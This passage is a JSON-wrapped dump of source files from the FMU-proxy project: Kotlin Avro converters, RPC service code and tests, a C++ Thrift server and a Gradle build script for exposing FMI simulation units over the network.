v.valueReference = valueReference\n v.declaredType = declaredType\n description?.also { v.description = it }\n causality?.also { v.causality = it.avroType() }\n variability?.also { v.variability = it.avroType() }\n initial?.also { v.initial = it.avroType() }\n\n when (this) {\n is IntegerVariable -> v.attribute = this.avroType()\n is RealVariable -> v.attribute = this.avroType()\n is StringVariable -> v.attribute = this.avroType()\n is BooleanVariable -> v.attribute = this.avroType()\n is EnumerationVariable -> v.attribute = this.avroType()\n else -> throw AssertionError()\n }\n\n }\n}\n\ninternal fun ModelVariables.avroType(): List<ScalarVariable> {\n return map { it.avroType() }\n}\n\ninternal fun Unknown.avroType(): no.mechatronics.sfi.fmuproxy.avro.Unknown {\n return no.mechatronics.sfi.fmuproxy.avro.Unknown().also { u ->\n u.index = index\n u.dependencies = dependencies\n dependenciesKind?.also { u.dependenciesKind = it.avroType() }\n }\n}\n\ninternal fun ModelStructure.avroType(): no.mechatronics.sfi.fmuproxy.avro.ModelStructure {\n return no.mechatronics.sfi.fmuproxy.avro.ModelStructure().also { ms ->\n ms.outputs = outputs.map { it.avroType() }\n ms.derivatives = derivatives.map { it.avroType() }\n ms.initialUnknowns = initialUnknowns.map { it.avroType() }\n }\n}\n\nfun DefaultExperiment.avroType(): no.mechatronics.sfi.fmuproxy.avro.DefaultExperiment {\n return no.mechatronics.sfi.fmuproxy.avro.DefaultExperiment().also {\n it.startTime = startTime\n it.stopTime = stopTime\n it.tolerance = tolerance\n it.stepSize = stepSize\n }\n}\n\ninternal fun CommonModelDescription.avroType(): ModelDescription {\n return ModelDescription().also { md ->\n\n md.guid = guid\n md.modelName = modelName\n md.fmiVersion = fmiVersion\n md.modelVariables = modelVariables.avroType()\n md.modelStructure = modelStructure.avroType()\n\n version?.also { md.version = it }\n license?.also { md.license = it }\n copyright?.also { md.copyright = it }\n author?.also { md.author = it }\n description?.also { md.description = it }\n generationTool?.also { md.generationTool = it }\n generationDateAndTime?.also { md.generationDateAndTime = it }\n defaultExperiment?.also { md.defaultExperiment = it.avroType() }\n\n }\n}\n\ninternal fun Causality.avroType(): no.mechatronics.sfi.fmuproxy.avro.Causality {\n return when(this) {\n Causality.INPUT -> no.mechatronics.sfi.fmuproxy.avro.Causality.INPUT_CAUSALITY\n Causality.OUTPUT -> no.mechatronics.sfi.fmuproxy.avro.Causality.OUTPUT_CAUSALITY\n Causality.CALCULATED_PARAMETER -> no.mechatronics.sfi.fmuproxy.avro.Causality.CALCULATED_PARAMETER_CAUSALITY\n Causality.PARAMETER -> no.mechatronics.sfi.fmuproxy.avro.Causality.PARAMETER_CAUSALITY\n Causality.LOCAL -> no.mechatronics.sfi.fmuproxy.avro.Causality.LOCAL_CAUSALITY\n Causality.INDEPENDENT -> no.mechatronics.sfi.fmuproxy.avro.Causality.INDEPENDENT_CAUSALITY\n else -> throw IllegalArgumentException()\n }\n}\n\ninternal fun Variability.avroType(): no.mechatronics.sfi.fmuproxy.avro.Variability {\n return when(this) {\n Variability.CONSTANT -> no.mechatronics.sfi.fmuproxy.avro.Variability.CONSTANT_VARIABILITY\n Variability.CONTINUOUS -> no.mechatronics.sfi.fmuproxy.avro.Variability.CONTINUOUS_VARIABILITY\n Variability.DISCRETE -> no.mechatronics.sfi.fmuproxy.avro.Variability.DISCRETE_VARIABILITY\n Variability.FIXED -> no.mechatronics.sfi.fmuproxy.avro.Variability.FIXED_VARIABILITY\n Variability.TUNABLE -> no.mechatronics.sfi.fmuproxy.avro.Variability.TUNABLE_VARIABILITY\n else -> throw IllegalArgumentException()\n }\n}\n\ninternal fun Initial.avroType(): no.mechatronics.sfi.fmuproxy.avro.Initial {\n return when(this) {\n Initial.CALCULATED -> no.mechatronics.sfi.fmuproxy.avro.Initial.CALCULATED_INITIAL\n Initial.EXACT -> no.mechatronics.sfi.fmuproxy.avro.Initial.EXACT_INITIAL\n Initial.APPROX -> no.mechatronics.sfi.fmuproxy.avro.Initial.APPROX_INITIAL\n else -> throw IllegalArgumentException()\n }\n}\n\ninternal fun DependenciesKind.avroType(): no.mechatronics.sfi.fmuproxy.avro.DependenciesKind {\n return when(this) {\n DependenciesKind.DEPENDENT -> no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.DEPENDENT_KIND\n DependenciesKind.CONSTANT -> no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.CONSTANT_KIND\n DependenciesKind.TUNABLE -> no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.TUNABLE_KIND\n DependenciesKind.DISCRETE -> no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.DISCRETE_KIND\n else -> throw IllegalArgumentException()\n }\n}\n\ninternal fun FmiStatus.avroType(): Status {\n return when (this) {\n FmiStatus.OK -> Status.OK_STATUS\n FmiStatus.Warning -> Status.WARNING_STATUS\n FmiStatus.Discard -> Status.DISCARD_STATUS\n FmiStatus.Error -> Status.ERROR_STATUS\n FmiStatus.Fatal -> Status.FATAL_STATUS\n FmiStatus.Pending -> Status.PENDING_STATUS\n FmiStatus.NONE -> throw RuntimeException()\n }\n}\n" }, { "alpha_fraction": 0.6303380727767944, "alphanum_fraction": 0.6316726207733154, "avg_line_length": 27.112499237060547, "blob_id": "0f600766ea6690aea0730c9dd4bfbe5a9e0ce42b", "content_id": "e0b9659d030511e48094e033c6a546b2b848448b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2248, "license_type": "permissive", "max_line_length": 89, "num_lines": 80, "path": "/java/FMU-proxy/fmu-proxy-gen/src/test/kotlin/no/mechatronics/sfi/fmuproxy/TestProxyGen.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelDescriptionParser\nimport org.junit.jupiter.api.*\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\nimport java.io.FileInputStream\nimport java.util.zip.ZipEntry\nimport java.util.zip.ZipInputStream\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\nclass TestProxyGen {\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger(ExecutableGenerator::class.java)\n }\n\n private val generatedJar: File\n\n init {\n val url = TestProxyGen::class.java.classLoader\n .getResource(\"fmus/cs/PumpControlledWinch/modelDescription.xml\")\n Assertions.assertNotNull(url)\n\n val xml = url.readText()\n val modelDescription = ModelDescriptionParser.parse(xml)\n generatedJar = File(\"${modelDescription.modelName}.jar\")\n\n }\n\n @AfterAll\n fun tearDown() {\n if (generatedJar.exists()) {\n if (generatedJar.delete()) {\n LOG.debug(\"Deleted generated jar '$generatedJar'\")\n }\n }\n }\n\n @Test\n fun generate() {\n\n val file = File(javaClass.classLoader\n .getResource(\"fmus/cs/PumpControlledWinch/PumpControlledWinch.fmu\").file)\n Assertions.assertTrue(file.exists())\n val args = arrayOf(\n \"-fmu\", file.absolutePath,\n \"-out\", File(\".\").absolutePath\n )\n ApplicationStarter.main(args)\n\n Assertions.assertTrue(generatedJar.exists())\n\n Assertions.assertTrue(isPresentInJar(\"modelDescription.xml\"))\n Assertions.assertTrue(isPresentInJar(\"definitions.proto\"))\n Assertions.assertTrue(isPresentInJar(\"service.proto\"))\n Assertions.assertTrue(isPresentInJar(\"unique_service.proto\"))\n\n }\n\n private fun isPresentInJar(path: String): Boolean {\n\n ZipInputStream(FileInputStream(generatedJar)).use {\n\n var nextEntry: ZipEntry? = it.nextEntry\n while (nextEntry != null) {\n val name = nextEntry.name\n if (name == path) {\n return true\n }\n nextEntry = it.nextEntry\n }\n\n }\n return false\n\n }\n\n}" }, { "alpha_fraction": 0.6012333035469055, "alphanum_fraction": 0.6076053380966187, "avg_line_length": 29.99363136291504, "blob_id": "a6bb9bf4790428ada6f7017158b2ebdfc4f62cd6", "content_id": "1194c7c463aab938ff010343006404e45c5eb990", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 4865, "license_type": "permissive", "max_line_length": 86, "num_lines": 157, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/jsonrpc/TestService.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.jsonrpc\n\nimport info.laht.yajrpc.RpcHandler\nimport info.laht.yajrpc.RpcParams\nimport info.laht.yajrpc.RpcRequestOut\nimport info.laht.yajrpc.RpcResponse\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.common.FmuRealRead\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelDescriptionParser\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.StepResult\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@EnabledOnOs(OS.WINDOWS)\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\nclass TestService {\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger(TestService::class.java)\n }\n\n private val fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/win64/FMUSDK/2.0.4/BouncingBall/bouncingBall.fmu\"))\n private val handler = RpcHandler(RpcFmuService(fmu))\n \n @Test\n fun testModelName() {\n\n val modelName = \"\"\"\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"FmuService.getModelName\",\n \"params\": []\n }\n \"\"\".let {\n RpcResponse.fromJson(handler.handle(it)!!)\n .getResult<String>()\n }\n\n LOG.info(\"modelName=$modelName\")\n Assertions.assertEquals(fmu.modelDescription.modelName, modelName)\n\n }\n\n @Test\n fun testGuid() {\n\n val guid = \"\"\"\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"FmuService.getGuid\",\n \"params\": null\n }\n \"\"\".let {\n RpcResponse.fromJson(handler.handle(it)!!).getResult(String::class.java)\n }\n\n LOG.info(\"guid=$guid\")\n Assertions.assertEquals(fmu.modelDescription.guid, guid)\n\n }\n\n @Test\n fun testModelDescriptionXml() {\n\n val xml = \"\"\"\n {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"FmuService.getModelDescriptionXml\",\n \"params\": []\n }\n \"\"\".let {\n RpcResponse.fromJson(handler.handle(it)!!).getResult(String::class.java)!!\n }\n\n ModelDescriptionParser.parse(xml).asCoSimulationModelDescription()\n\n }\n\n @Test\n fun testInstance() {\n\n val fmuId = RpcRequestOut(\n methodName = \"FmuService.createInstanceFromCS\",\n params = RpcParams.noParams()\n ).toJson().let { RpcResponse.fromJson(handler.handle(it)!!) }\n .getResult(Int::class.java)!!\n\n val init = RpcRequestOut(\n methodName = \"FmuService.init\",\n params = RpcParams.listParams(fmuId)\n ).toJson().let { RpcResponse.fromJson(handler.handle(it)!!) }\n .getResult(FmiStatus::class.java)!!\n\n Assertions.assertEquals(FmiStatus.OK, init)\n\n val currentTimeMsg = RpcRequestOut(\n methodName = \"FmuService.getCurrentTime\",\n params = RpcParams.listParams(fmuId)\n ).toJson()\n\n fun currentTime() = currentTimeMsg\n .let{ RpcResponse.fromJson(handler.handle(it)!!) }\n .getResult(Double::class.java)!!\n\n val currentTime = currentTime()\n LOG.info(\"currentTime=$currentTime\")\n Assertions.assertEquals(0.0, currentTime)\n\n val h = RpcRequestOut(\n methodName = \"FmuService.readReal\",\n params = RpcParams.listParams(fmuId, \"0\")\n ).toJson().let{ RpcResponse.fromJson(handler.handle(it)!!) }\n .getResult(FmuRealRead::class.java)!!\n\n LOG.info(\"h=$h\")\n Assertions.assertEquals(1.0, h.value)\n\n val stepMsg = RpcRequestOut(\n methodName = \"FmuService.step\",\n params = RpcParams.mapParams(\"fmuId\" to fmuId, \"stepSize\" to 1E-3)\n ).toJson()\n\n for (i in 0 until 5) {\n val stepResult = stepMsg\n .let { RpcResponse.fromJson(handler.handle(it)!!) }\n .getResult(StepResult::class.java)!!\n Assertions.assertEquals(FmiStatus.OK, stepResult.status)\n\n LOG.info(\"currentTime=${currentTime()}\")\n\n }\n\n val terminateMsg = RpcRequestOut(\n methodName = \"FmuService.terminate\",\n params = RpcParams.listParams(fmuId)\n ).toJson()\n\n val status = RpcResponse.fromJson(handler.handle(terminateMsg)!!)\n .getResult(FmiStatus::class.java)!!\n Assertions.assertEquals(FmiStatus.OK, status)\n\n }\n\n}" }, { "alpha_fraction": 0.7577450275421143, "alphanum_fraction": 0.7618080377578735, "avg_line_length": 37.588233947753906, "blob_id": "7afcb814778febefa49abbf4a17adbb655ba1525", "content_id": "1d5c910ed8b1cd3e4e27237b63eca06069c3b6a8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1969, "license_type": "permissive", "max_line_length": 127, "num_lines": 51, "path": "/cpp/FMU-proxy/server/ThriftServer.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n\n#include \"ThriftServer.h\"\n\nusing namespace std;\nusing namespace fmuproxy;\nusing namespace fmuproxy::server;\n\n\n::ThriftServer::ThriftServer(shared_ptr<FmuWrapper> fmu, int port) {\n\n shared_ptr<FmuServiceHandler> handler(new FmuServiceHandler(fmu));\n shared_ptr<TProcessor> processor(new FmuServiceProcessor(handler));\n shared_ptr<TServerTransport> serverTransport(new TServerSocket(port));\n shared_ptr<TTransportFactory> transportFactory(new TBufferedTransportFactory());\n shared_ptr<TProtocolFactory> protocolFactory(new TBinaryProtocolFactory());\n\n this->server = shared_ptr<TSimpleServer>(new TSimpleServer(processor, serverTransport, transportFactory, protocolFactory));\n\n}\n\nvoid ::ThriftServer::serve() {\n server->serve();\n}\n\nvoid ::ThriftServer::stop() {\n server->stop();\n}\n\n" }, { "alpha_fraction": 0.6689310669898987, "alphanum_fraction": 0.6711099743843079, "avg_line_length": 28.55681800842285, "blob_id": "c3f5f832d52ad76c16dc2df81235cc86ec04f058", "content_id": "876e6f44793e36c85ebfca90243dab60e28f34a4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 7802, "license_type": "permissive", "max_line_length": 99, "num_lines": 264, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/jsonrpc/service/RpcFmuService.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.jsonrpc.service\n\nimport com.google.gson.Gson\nimport info.laht.yajrpc.RpcMethod\nimport info.laht.yajrpc.RpcService\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.fmu.Fmus\nimport no.mechatronics.sfi.fmuproxy.solver.parseIntegrator\nimport org.apache.commons.math3.ode.FirstOrderIntegrator\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\n\nprivate fun getFmu(id: Int): FmiSimulation {\n val fmu = Fmus.get(id)\n if (fmu != null) {\n return fmu\n }\n throw IllegalArgumentException(\"No fmu with id=$id\")\n}\n\n\n/**\n * @author Lars Ivar Hatledal\n */\nclass RpcFmuService(\n private val fmu: Fmu\n) : RpcService {\n\n override val serviceName = \"FmuService\"\n\n val modelDescription: CommonModelDescription\n @RpcMethod\n get() = fmu.modelDescription\n\n val fmiVersion: String\n @RpcMethod\n get() = modelDescription.fmiVersion\n\n val guid: String\n @RpcMethod\n get() = modelDescription.guid\n\n val modelName: String\n @RpcMethod\n get() = modelDescription.modelName\n\n val modelDescriptionXml: String\n @RpcMethod\n get() = fmu.modelDescriptionXml\n\n\n @RpcMethod\n fun createInstanceFromCS(): Int {\n return Fmus.put(fmu.asCoSimulationFmu().newInstance())\n }\n\n @RpcMethod\n fun createInstanceFromME(solver: Solver): Int {\n\n fun selectDefaultIntegrator(): FirstOrderIntegrator {\n val stepSize = fmu.modelDescription.defaultExperiment?.stepSize ?: 1E-3\n LOG.warn(\"No valid integrator found.. Defaulting to Euler with $stepSize stepSize\")\n return org.apache.commons.math3.ode.nonstiff.EulerIntegrator(stepSize)\n }\n\n val integrator = parseIntegrator(solver.name, solver.settings) ?: selectDefaultIntegrator()\n return Fmus.put(fmu.asModelExchangeFmu().newInstance(integrator))\n }\n\n @RpcMethod\n fun isTerminated(fmuId: Int): Boolean {\n return getFmu(fmuId).isTerminated\n }\n\n @RpcMethod\n fun getCurrentTime(fmuId: Int): Double {\n return getFmu(fmuId).currentTime\n }\n\n @RpcMethod\n fun init(fmuId: Int): FmiStatus {\n return getFmu(fmuId).let {\n it.init()\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun init(fmuId: Int, startTime: Double): FmiStatus {\n return getFmu(fmuId).let {\n it.init(startTime)\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun init(fmuId: Int, startTime: Double, stopTime: Double): FmiStatus {\n return getFmu(fmuId).let {\n it.init(startTime, stopTime)\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun step(fmuId: Int, stepSize: Double): StepResult {\n return getFmu(fmuId).let {\n it.doStep(stepSize)\n StepResult(\n simulationTime = it.currentTime,\n status = it.lastStatus\n )\n }\n }\n\n @RpcMethod\n fun terminate(fmuId: Int): FmiStatus {\n return getFmu(fmuId).let {\n it.terminate()\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun reset(fmuId: Int): FmiStatus {\n return getFmu(fmuId).let {\n it.reset()\n it.lastStatus\n }\n }\n\n @RpcMethod\n fun readInteger(fmuId: Int, vr: ValueReference): FmuIntegerRead {\n return getFmu(fmuId).variableAccessor.readInteger(vr)\n }\n\n @RpcMethod\n fun bulkReadInteger(fmuId: Int, vr: ValueReferences): FmuIntegerArrayRead {\n return getFmu(fmuId).variableAccessor.readInteger(vr)\n }\n\n @RpcMethod\n fun readReal(fmuId: Int, vr: ValueReference): FmuRealRead {\n return getFmu(fmuId).variableAccessor.readReal(vr)\n }\n\n @RpcMethod\n fun bulkReadReal(fmuId: Int, vr: ValueReferences): FmuRealArrayRead {\n return getFmu(fmuId).variableAccessor.readReal(vr)\n }\n\n @RpcMethod\n fun readString(fmuId: Int, vr: ValueReference): FmuStringRead {\n return getFmu(fmuId).variableAccessor.readString(vr)\n }\n\n @RpcMethod\n fun bulkReadString(fmuId: Int, vr: ValueReferences): FmuStringArrayRead {\n return getFmu(fmuId).variableAccessor.readString(vr)\n }\n\n @RpcMethod\n fun readBoolean(fmuId: Int, vr: ValueReference): FmuBooleanRead {\n return getFmu(fmuId).variableAccessor.readBoolean(vr)\n }\n\n @RpcMethod\n fun bulkReadBoolean(fmuId: Int, vr: ValueReferences): FmuBooleanArrayRead {\n return getFmu(fmuId).variableAccessor.readBoolean(vr)\n }\n\n @RpcMethod\n fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeInteger(vr, value)\n }\n\n @RpcMethod\n fun bulkWriteInteger(fmuId: Int, vr: ValueReferences, value: IntArray): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeInteger(vr, value)\n }\n\n @RpcMethod\n fun writeReal(fmuId: Int, vr: ValueReference, value: Double): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeReal(vr, value)\n }\n\n @RpcMethod\n fun bulkWriteReal(fmuId: Int, vr: ValueReferences, value: DoubleArray): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeReal(vr, value)\n }\n\n @RpcMethod\n fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeString(vr, value)\n }\n\n @RpcMethod\n fun bulkWriteString(fmuId: Int, vr: ValueReferences, value: StringArray): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeString(vr, value)\n }\n\n @RpcMethod\n fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeBoolean(vr, value)\n }\n\n @RpcMethod\n fun bulkWriteBoolean(fmuId: Int, vr: ValueReferences, value: BooleanArray): FmiStatus {\n return getFmu(fmuId).variableAccessor.writeBoolean(vr, value)\n }\n\n private companion object {\n val LOG: Logger = LoggerFactory.getLogger(RpcFmuService::class.java)\n }\n\n}\n\nclass StepResult(\n val status: FmiStatus,\n val simulationTime: Double\n)\n\nclass Solver(\n val name: String,\n val settings: String\n) {\n\n// private val properties = Gson().fromJson(json, Map::class.java) as Map<String, *>\n//\n// fun <T> getProperty(name: String, type: Class<T>): T? {\n// return properties[name] as T\n// }\n//\n// inline fun <reified T> getProperty(name: String): T? {\n// return getProperty(name, T::class.java)\n// }\n\n}" }, { "alpha_fraction": 0.6483679413795471, "alphanum_fraction": 0.6587536931037903, "avg_line_length": 26.520408630371094, "blob_id": "9bc71f1b1fb314f03baecbd55c9e26b1a304710a", "content_id": "213312d81b42e919ef47411efc0bf2ab67a835a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2696, "license_type": "permissive", "max_line_length": 92, "num_lines": 98, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/grpc/TestGrpcBouncingME.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.grpc\n\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.Solver\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@EnabledOnOs(OS.WINDOWS)\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestGrpcBouncingME {\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger(TestGrpcBouncingME::class.java)\n }\n\n private val fmu: Fmu\n private val server: GrpcFmuServer\n private val client: GrpcFmuClient\n private val modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/ModelExchange/win64/FMUSDK/2.0.4/BouncingBall/bouncingBall.fmu\"))\n modelDescription = fmu.modelDescription\n\n server = GrpcFmuServer(fmu)\n val port = server.start()\n\n client = GrpcFmuClient(\"127.0.0.1\", port)\n\n }\n\n @AfterAll\n fun tearDown() {\n server.stop()\n client.stop()\n fmu.close()\n }\n\n @Test\n fun testModelName() {\n val modelName = client.modelDescription.modelName.also { LOG.info(\"modelName=$it\") }\n Assertions.assertEquals(modelDescription.modelName, modelName)\n }\n\n @Test\n fun testGuid() {\n val guid = client.modelDescription.guid.also { LOG.info(\"guid=$it\") }\n Assertions.assertEquals(modelDescription.guid, guid)\n }\n\n\n @Test\n fun testInstance() {\n\n val solver = Solver(\"Euler\").apply {\n addProperty(\"step_size\", 1E-3)\n }\n\n client.newInstance(solver).use { instance ->\n\n instance.init()\n Assertions.assertEquals(FmiStatus.OK, instance.lastStatus)\n\n val h = instance.getVariableByName(\"h\").asRealVariable()\n\n h.read().also {\n LOG.info(\"h=${it.value}\")\n Assertions.assertEquals(1.0, it.value)\n }\n\n val dt = 1.0/100\n while (instance.currentTime < 2) {\n val step = instance.doStep(dt)\n Assertions.assertTrue(step)\n\n LOG.info(\"h=${h.read()}\")\n\n }\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.5398753881454468, "alphanum_fraction": 0.5514018535614014, "avg_line_length": 31.414140701293945, "blob_id": "261b3239582895703432d39145837d7374599296", "content_id": "cad501d801de23ea25c87b9caf02b87cadde03ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 3210, "license_type": "permissive", "max_line_length": 115, "num_lines": 99, "path": "/java/FMU-proxy/fmu-proxy/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nbuildscript {\n repositories {\n jcenter()\n }\n dependencies {\n classpath 'com.github.jengelman.gradle.plugins:shadow:2.0.4'\n }\n}\n\napply plugin: 'kotlin'\napply plugin: 'maven'\napply plugin: 'signing'\napply plugin: 'com.github.johnrengelman.shadow'\n\ngroup = 'no.mechatronics.sfi.fmuproxy'\nversion = '0.1-SNAPSHOT'\n\ndef snapshot = true\ndef fmi4j_version = snapshot ? fmi4j_snapshot_version : fmi4j_stable_version\n\ndependencies {\n\n implementation group: 'io.grpc', name: 'grpc-netty', version: '1.11.0'\n implementation group: 'info.picocli', name: 'picocli', version: '2.3.0'\n implementation group: 'info.laht', name: 'YAJ-RPC', version: '0.7'\n\n compile group: 'no.mechatronics.sfi.fmi4j', name: 'fmi-import', version: fmi4j_version, changing: snapshot\n compile group: 'no.mechatronics.sfi.fmuproxy', name: 'rpc-definitions', version: '0.1-SNAPSHOT', changing: true\n\n implementation group: 'org.slf4j', name: 'slf4j-api', version: '1.7.25'\n runtimeOnly group: 'org.slf4j', name: 'slf4j-log4j12', version: '1.7.25'\n\n testImplementation project(':fmu-proxy-clients')\n\n}\n\njar {\n manifest {\n attributes 'Main-Class': \"no.mechatronics.sfi.fmuproxy.FmuProxy\"\n }\n}\n\nshadowJar {\n baseName = 'fmu-proxy'\n classifier = null\n version = null\n}\n\nif (hasProperty(\"ossrhUsername\") && hasProperty(\"ossrhPassword\")) {\n\n signing {\n sign configurations.archives\n }\n\n uploadArchives {\n repositories {\n mavenDeployer {\n beforeDeployment { MavenDeployment deployment -> signing.signPom(deployment) }\n\n repository(url: \"https://oss.sonatype.org/service/local/staging/deploy/maven2\") {\n authentication(userName: ossrhUsername, password: ossrhPassword)\n }\n\n snapshotRepository(url: \"https://oss.sonatype.org/content/repositories/snapshots\") {\n authentication(userName: ossrhUsername, password: ossrhPassword)\n }\n\n pom.project {\n name archivesBaseName\n packaging 'jar'\n // optionally artifactId can be defined here\n description 'A collection of RPC servers for exposing FMUs over the network'\n url 'https://github.com/SFI-Mechatronics/FMU-proxy'\n\n scm {\n connection 'scm:git:git://github.com/SFI-Mechatronics/FMU-proxy.git'\n developerConnection 'scm:git:ssh://github.com/SFI-Mechatronics/FMU-proxy.git'\n url 'https://github.com/SFI-Mechatronics/FMU-proxy/tree/master'\n }\n\n licenses {\n license {\n name 'The MIT License'\n url 'https://opensource.org/licenses/mit-license.php'\n }\n }\n\n developers {\n developer {\n id 'laht'\n name 'Lars Ivar Hatledal'\n email '[email protected]'\n }\n }\n }\n }\n }\n }\n}\n" }, { "alpha_fraction": 0.6598891019821167, "alphanum_fraction": 0.6654343605041504, 